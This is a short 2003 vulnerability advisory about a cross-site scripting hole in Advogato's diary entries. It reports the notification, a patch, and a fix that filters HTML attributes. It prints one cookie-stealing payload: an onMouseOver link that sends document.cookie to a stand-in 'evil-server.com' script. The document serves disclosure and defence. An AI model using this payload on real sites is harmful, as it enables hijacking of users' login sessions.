Advogato is a community website which serves as a resource for free software developers.
It provides several useful services for developers, including the ability to post diary entries, and a simple project directory.
One of its intended purposes is to serve as a test-bed for trust metrics, with the idea that you can rate other members contributions towards open source software. This kind of system is very interesting for a great number of reasons, and is documented nicely online.
(The site is open to anybody to join, although the peer rating system is focussed upon rating users contribution to free software).
Previously there was a vulnerability with Advogata's handling of projects, and the relationships people could define.
This attack is a similar one, stemming from the ability of users to create diary entries which would contain malicious HTML.
A simple means of exploiting this would have been to contain code like this in a diary entry:<a href="http://www.some.site.com" onMouseOver="document.location= 'http://www.evil-server.com/cgi-bin/steal.cgi?document.cookie'" </a>
Any logged in user would have their login cookie stolen if they were to click upon the link.
The real solution to this problem is to filter out all unknown attributes when posting diary entries.
I submitted a hacky/dirty patch to do this job. But a real solution would be much nicer.
- Notified : Thu Mar 13 10:30:05 2003
- My Patch : Fri Mar 14 20:30:04 2003